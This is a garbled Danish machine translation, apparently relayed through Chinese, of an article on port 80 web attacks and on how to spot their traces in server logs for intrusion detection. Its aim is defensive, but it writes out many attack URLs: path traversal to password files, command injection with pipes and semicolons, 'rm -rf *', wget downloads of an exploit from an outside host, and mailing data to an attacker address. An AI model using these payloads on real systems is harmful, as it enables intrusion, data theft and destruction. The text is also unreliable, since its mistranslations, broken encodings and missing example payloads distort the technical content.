I. Resumé
II. En detaljeret beskrivelse af
III. Yderligere
IV. Spillover Analyse
V. Transcoding
VI. Konklusion
[Abstract]
web site 80 som standard service port, om de forskellige sikkerhedsmæssige problemer holde det ud for frigivelsen nogle af disse sårbarheder tillade en angriber at få selv de systemadministratoren tilladelse til at komme ind på selve webstedet, følgende er Zenomorph port 80 angreb på nogle af de spor forskning, og fortælle dig, hvordan du finder problemer i loggen registre.
[Detail]
Her i del gennem en række Liezi vises på web-servere og applikationer på deres generelle angreb, og dens spor, som kun udgør Liezi større angreb, er der ingen liste over alle form for angreb, denne sektion vil detaljeret beskrivelse af, hvilken rolle hver angreb, og hvordan man udnytter disse sårbarheder til at angribe.
(1) "." ".." Og "..." anmodning
Spor af disse angreb er meget almindeligt, at web-applikationer og web-server, der bruges til at give en hacker mulighed eller orm-virus program til at ændre web server vej, for at få adgang til lukkede områder. De fleste CGI programmer med disse mangler, ".." anmodning.
Eksempel:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Dette viser hackeren Liezi anmodning mosd denne fil, hvis hackeren mulighed for gennembrud web server roden, så få flere oplysninger og for at få yderligere privilegier.
(2) "% 20" anmodning
20% er hex værdi, at de 16 rum, selv om dette ikke betyder, at du kan bruge noget, men når du ser log vil finde det, nogle web-server program, der kører på denne art kan gennemføres effektivt Derfor bør du omhyggeligt gennemgå log. På den anden side, kan anmodningen undertiden hjælp til at udføre nogle kommandoer.
Eksempel:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Denne Liezi viser hacker at udføre en unix-kommando, der opregner hele kataloget af ønskede dokumenter, hvilket angriberen at få adgang til vigtige filer på dit system, for at hjælpe ham til yderligere at skabe betingelserne for at opnå privilegier.
(3) "% 00" anmodning
% 00 sagde 16-byte hexadecimal tom, var han i stand til at narre webapplikation, og anmode om forskellige typer af filer.
Eksempler:
http://host/cgi-bin/lame.cgi?page=index.html
Dette kan være en gyldig anmodning i maskinen, hvis en hacker bevidst om denne anmodning blev en succes, vil han se nærmere for cgi procedurer.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Måske cgi program ikke acceptere denne anmodning, fordi det er den anmodning om at kontrollere filnavnsuffiks, såsom: html.shtml eller andre typer af filer. De fleste programmer vil fortælle dig det ønskede filtype er ugyldig, denne gang vil fortælle angriberen anmoder fil skal være et tegn på en filtype endelse, så en hacker kan få systemet stien, filnavnet, hvilket resulterede i dit system mere følsomme oplysninger
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Opmærksomheden på denne anmodning, vil det snyde cgi program, at dette dokument er at fastlægge det acceptable filtyper, nogle anvendelser af effektive inspektioner dum anmodning fil, som er almindeligt anvendte angriberen.
(4) "|" anmodning
Dette er en pibe karakter i den unix system, en anmodning om hjælp i forbindelse med gennemførelsen af flere system kommandoer på samme tid.
Eksempel:
# Cat adgangs_log | grep-i ".."
(Denne kommando vil vise loggen i ".." anmodning, som almindeligvis anvendes i angreb og orme fundet)
Ofte, at mange web-applikationer bruge dette tegn, hvilket også fører til falske alarmer i IDS logs.
I omhyggelig gennemgang af din ansøgning, så den fordel, at falske alarmer i intrusion detektionssystemer.
Her er nogle af Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Denne anmodning kommando, følgende er nogle ændringer i Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Denne anmodning er opført i unix system / etc af alle filer
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Gennemførelsen af anmodningen kat og grep kommandoen kommando vil blive gennemført, så tjek den "lamme"
(5) ";" anmodning
I unix systemer, giver denne karakter flere kommandolinje udførelse
Eksempel:
# Id; uname-a
(Gennemførelse af id-kommandoen, efterfulgt af gennemførelsen af uname kommandoen)
Nogle web-program med denne karakter, kan resultere i din IDS logfiler en advarsel om fiasko, bør du omhyggeligt kontrollere dine web-program, så du reducere risikoen for fiasko IDS indberetninger.
(6) " " og " " Request
Bør tjekke dine logfiler registrerer de to figurer, en række årsager, hvoraf den første er den karakter, som tilføjede data i dokumentet
Eksempel 1:
# Echo "din hax0red H0 H0" / etc / motd (motd anmodning skriftlige oplysninger i dette dokument)
En hacker kan nemt bruge anmodningen som ovenfor manipulation med din webside. Såsom den berømte RDS udnytte angriberen er ofte bruges til at ændre web-side.
Eksempel 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html du vil bemærke, at sproget af tegn her, han brugte også " "," " tegn, sådanne angreb kan ikke medføre, at hacker at få adgang til systemet, det forvirrede folk tror, at det er et legitimt websted information (som fører til mennesker besøger dette link for at besøge angriberen at indstille adresse, kan denne anmodning være kodet i 16 hex tegn i form, således at spor af angrebet er ikke så indlysende)
(7) "!" Request
Fælles sprog om denne karakter anmodning SS (Server Side Include) Jeg angreb, hvis angriberen er en hacker forvirre brugeren klikker på linket sæt, og det samme som ovenfor.
Eksempel:
http://host1/something.php =
Den Lieh-tzu er hacker kan gøre det til en fil på webstedet host2 fra host1 vises ovenfor (naturligvis kræve besøgende til at besøge hackerens forbindelsesindstillinger. Denne anmodning kan omdannes til 16 hex encoding maske, ikke nemme at finde)
Samtidig kan denne tilgang også udføre kommandoen myndighed hjemmeside
Eksempel:
http://host/something.php =
Den Lieh-run på fjernbetjeningen system "id" kommando, vil det vise web site brugerens id, er normalt "nobody" eller "www"
Denne form giver også den medfølgende skjulte filer.
Eksempel:
http://host/something.php =
Den skjulte filer. Htpasswd vil ikke blive vist, vil Apache nægte at etablere sådanne regler til. Ht anmodningen form, og SSI logo vil omgå sådanne restriktioner, og føre til sikkerhedsmæssige problemer
(8) "," Request
Sådanne angreb bruges til at forsøge at fjernstyre indsætte en PHP webapplikation procedurer, kan det gøre det muligt at udføre kommandoer, afhængigt af server-indstillinger, og andet arbejde af en række faktorer (såsom php er indstillet til fejlsikret tilstand)
Eksempel: http://host/something.php = passthru ("id ");?
I nogle simple php ansøgning, kan det være at web site på fjernbetjeningen systembruger rettigheder til at udføre den lokale kommando
(9) "` "anmodning
Dette tal anvendes ofte i perl i ryggen af kommandoen, tegn i en web-applikation er ikke altid den Shiyong, så hvis du ser det i loggen, skal det være meget forsigtig
Eksempel:
http://host/something.cgi = `id`
Skriv en perl cgi pågældende program vil føre til gennemførelse af id-kommandoen
[Yderligere]
I det følgende afsnit vil drøfte gennemførelsen af flere angreb kunne befale, sammen med de ønskede dokumenter, og hvis du har en ekstern kommando udførelse fejl, bør det være, hvordan du kontrollerer opdagelse. Denne del er blot for at give dig en god idé, og fortæl dit system, hvad der sker, angribere forsøge at angribe dit system spor, men ikke en liste over alle de hacker at bruge kommandoer og anmodninger.
"/ Bin / ls"
Denne kommando beder hele vejen, i mange web-applikationer har dette smuthul, hvis du logger ind mange steder en sådan anmodning, er det muligt for store fjernkørsel af programkode kommando sårbarhed, men ikke nødvendigvis et problem kan også være en falsk alarm. Endnu en gang mindede, web skriftlig ansøgning (cgi, asp, php ... osv.) er grundlaget for sikkerheden
Eksempel:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Dette er en vinduer af skallen, hvis en hacker adgang til og køre dette script i server-opsætningen på de betingelser, tilladt i vinduerne maskinen kan gøre noget, en masse orme er gennem port 80, meddelelse til den eksterne maskine
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Dette er en to binære filer, det er problemet, og / bin / ls, ligesom, hvis du logger ind mange steder Zhezhong anmodning, der er stor mulighed for, at sårbarheden til at udføre kommandoer på afstand, men ikke nødvendigvis et problem kan også være en falsk alarm.
Det vil vise, hvilken del der hører til hvilken bruger og gruppe
Eksempel:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Denne kommando kan slette filer uden den korrekte brug er meget farligt
Eksempler:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget og tftp" command
Disse kommandoer er ofte hackeren kan opnå yderligere privilegier til at downloade filer, wget er en unix-kommando under, kan bruges til at hente bagdøre, tftp er under kommando unix og NT, der bruges til at hente filen. Nogle IIS orme spreder sig ved tftp at kopiere virus til andre værter
Eksempler:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// vært / cgi-bin / bad.cgi? DOH = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat" kommando
Denne kommando bruges til at se indholdet af filen, der anvendes til at læse de vigtige oplysninger, såsom konfigurationsfiler, password-filer, kredit filer og dokumenter, som du kan tænke på
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = kat% 20/etc/motd;
"Echo" kommando
Denne kommando bruges til at skrive data til filen, såsom "index.html"
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwier% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiwier% 20was% 20here"% 20 % 200day.txt;
"Ps" kommando
Lister igangværende proces, fortæller angriberen, at en fjernvært kører software for at få en idé om sikkerhedsspørgsmål med at indhente yderligere tilladelser
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH = ps% 20-aux;
"Kill og killall" command
UNIX-systemer med henblik på at dræbe denne proces, en hacker kan bruge denne kommando til at stoppe systemtjenester og processer kan også slette sporene af angriberen, nogle udnytter vil producere en masse børn processer
Eksempler: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" kommando
Denne kommando fortæller angriberen den eksterne maskine navn i nogen tid, via denne hjemmeside, for at vide, hvilken internetudbyder, en hacker, der kan besøges i dag. Uname-a til at anmode normalt, vil disse blive registreret i logfilen
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? DOH = uname% 20-en;
"Cc, gcc, perl, python, etc ..." kompilere / fortolke kommandoen
Angriber gennem wget eller tftp download udnytte og bruge de cc, gcc compiler til at udarbejde dette til et eksekverbart program, og yderligere adgangsrettigheder
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c. / a.out% 20-p% 2.031.337;
Hvis du får vist logfilerne findes i "perl" python "Disse instruktioner kan være en fjern angriber at hente perl, python-script, og forsøgte at få privilegier lokale
"Post" kommandoen
Angribere ofte bruge denne kommando, men nogle vigtige dokumenter til hackerens egen postkasse, men også villig til at e-mail bombeangreb udføres
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." og andre kommandoer
UNIX-systemer med henblik på at give dem mulighed for at ændre filrettigheder
chown = tillader indstilling filen ejeren chmod = giver mulighed for at set file permissions chgrp = hotelejeren til at ændre den gruppe tilladelser på filer chsh = lov til at ændre brugerens shell
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" fil
Dette er systemets password-filen, som regel skygge off, og giver ikke mulighed for at se den krypterede adgangskode, men for en angriber, der kan vide, hvad der er gyldig bruger, og systemets absolutte sti, sitenavnet og andre oplysninger, som det plejer ved skygge fra, så angriberen vil normalt se / etc / shadow fil
"/ Etc / master.passwd"
Denne fil er en BSD system password fil, kryptere adgangskoden indeholder, er dokumentet read-only root-konto Jin Jin, og nogle ufaglærte angriber, der Dakai han Shituduqu inde indhold., Hvis webstedet Shiyi root privilegier for at køre, så angriberne, der kan læse indholdet af systemadministratoren en masse problemer kommer den ene efter den anden
"/ Etc / shadow"
Indeholder en adgangskode krypteret system, kan du læse det samme på root-kontoen, og / et / master.passwd næsten
"/ Etc / motd"
Når brugerne logger ind på unix-systemet, oplysninger vises i feltet "Besked fra Day" 文件, den Ta give vigtige oplysninger om systemet og brugeren af nogle af indstillingerne 管理员, Na Xie ønsker at brugere skal se, er ikke, indeholder også systemet version information, angriberen normalt se denne fil, at forstå, hvad systemet kører på angriberen, er det næste skridt er at søge efter denne type systemer, udnytte, og yderligere adgang til systemrettigheder
"/ Etc / hosts"
Dokumentet giver ip-adresse og netværk information, en hacker kan lære mere om systemets netværksindstillinger
"/ Usr / local / apache / conf / httpd.conf"
Dette er en Apache webserver konfiguration fil, kan en hacker forstå, såsom cgi, ssi og andre oplysninger er tilgængelige
"/ Etc / inetd.conf"
Dette er inetd service opsætningsfil, kan en hacker lære den eksterne maskine, start disse tjenester, uanset om de anvendes indpakning adgangskontrol, hvis vi finder wrapper kører, en hacker det næste skridt vil tjekke "/ etc / hosts.allow" og "/ etc / hosts.deny" fil, og som kan ændre nogle indstillinger, adgangsprivilegier
". Htpasswd. Htaccess, og. Htgroup"
Disse filer er normalt 在 hjemmeside bruges til at godkende brugere, kan en hacker få vist disse filer, og adgang til brugernavn og password, krypteret adgangskoden Wen Jian. Htpasswd Pi, gennem en enkel procedure til at dekryptere crack, tillade en angriber at få adgang til webstedet Zhong beskyttede områder (normalt bruger med samme brugernavn og adgangskode, kan angriberen selv besøger andre hensyn)
"Adgangs_log og error_log"
Det er de apache server log filer, angriberne ofte se disse filer, se på disse anmodninger registreres disse og andre anmodninger til forskellige steder
Typisk vil angriberen ændre disse log filer, såsom hans egen adresse information, angriberen gennem port 80 gennem dit system og dit backup system heller ikke virker, er der ingen anden dokumentation program registreringssystem status, hvilket ville intrusion detection bliver meget vanskeligt at arbejde
"[Drive-brev]: winntrepairsam._ eller [drevbogstav]: winntrepairsam"
Windows NT system password-fil, hvis fjernbetjeningen kommandoen ikke kan gennemføres, vil angribere normalt anmode om disse dokumenter, derefter "l0pht knæk" af den type password sprængning værktøjer til at knække, hvis angriberen forsøger at angribe administrator's password-filen, hvis lykkes, så den eksterne maskine vil være angriberen får kontrol
[Overflow analyse]
Jeg er ikke i denne artikel nævnes, at mere Di Guan Yu overflow emne, vil jeg give ud af, hvad disse fænomener og spor af bemærkelsesværdige og særligt problematiske, ofte angreb via en buffer angreb 编码 转换 og andre kanaler Dadaobuyi Fa Xian
Her er en simpel Lie Zi
Eksempel: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Dette Liezi viser angriberen på en ansøgning om at sende en masse En karakter, for at teste programmet en buffer overflow, kan buffer overflow få en ekstern kommando udførelse vært tilladelser, hvis ejeren har setuid og procedurer for root gennem overflow, kan få adgang til hele systemet, hvis de ikke lide setuid program, så overløbet er kun ved at køre websidens brugernes rettigheder
Her kan ikke sige til alle de omstændigheder, men du bør regelmæssigt kontrollere din logfil, hvis denne dag pludselig fundet en masse hits, men normalt ikke mere end ansøgningen, betyder, at du bliver udsat for overflow angreb, naturligvis, kan også være Et nyt netværk orm angreb
[Transcoding]
Alle angrebene ovennævnte anmodning angriberen normalt kender IDS systemer ofte mekanisk check anmodning, normalt angriberen vil bruge datakonvertering værktøj til at konvertere den anmodede indholdsformat 16 band, hvilket resulterede i IDS vil ignorere disse anmodninger Vi er bekendt med CGI sårbarhed scanningsværktøj, er en god Liezi bakkenbart. Hvis du få vist loggen over den tid, fundet et stort antal 16-band og ikke nogle fælles tegn, så angriberen kan prøve at bruge nogle af de måder at angribe dit system
En hurtig måde er din logfil anmodningen om de 16 hex, kopiere det til din browser, kan browseren omregnes til ret til at kræve, og vises indholdet af anmodningen, hvis du ikke modet til at tage denne risiko, en simpel mand ASCII, kan give dig den rigtige kode.
[Konklusion]
Denne artikel kan ikke dække alle de 80 havne i angrebet, men de fleste har været nævnt mere end det generelle angreb, og fortælle dig, hvordan du tjekke dine logfiler, og hvordan du kan tilføje såsom antallet af IDS regler, skriver hun Formålet er at web systemadministratoren bør være bekymrede over, hvad en god idé på samme tid, jeg håber denne artikel hjælper til web program webudviklere til at skrive bedre programmer
AF BEMÆRK: Hvis du har kommentarer og forslag, så send en e-mail admin@cgisecurity.com.